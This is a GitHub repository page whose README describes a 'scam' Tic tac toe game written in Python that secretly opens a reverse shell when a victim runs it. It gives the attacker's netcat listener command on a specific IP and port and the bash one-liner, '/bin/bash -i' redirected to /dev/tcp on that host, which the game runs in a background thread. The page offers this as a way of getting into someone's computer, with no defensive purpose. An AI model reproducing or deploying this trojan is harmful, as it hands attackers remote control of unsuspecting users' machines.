Skip to content

hirwablessing/python-game-scam

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 

Repository files navigation

Tic tac toe game scam

Scam attack that uses Tic tac toe game to catch victims

Getting started

  • Clone the repository
  • navigate to directory python-game-scam
  • run python3 ticatactoe.py (victim is caught 😋)

How the scam works

  • The hacker opens up a port at 82.165.97.169 for the victim to connect via port 2004
   $ nc -lnvp 2004 -s 82.165.97.169

The victim thinks that he/she is just playing a game.

When the victim opens up the game, a thread is created the in the background to run a bash script that connects to the server hence the victim is hacked.

The script to run in background is

$ /bin/bash -i > /dev/tcp/82.165.97.169/2004 0<&1 2>&1

Hacker

hirwablessing7@gmail.com A.K.A blessingartcreator

About

Getting into someon's computer by running a game

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages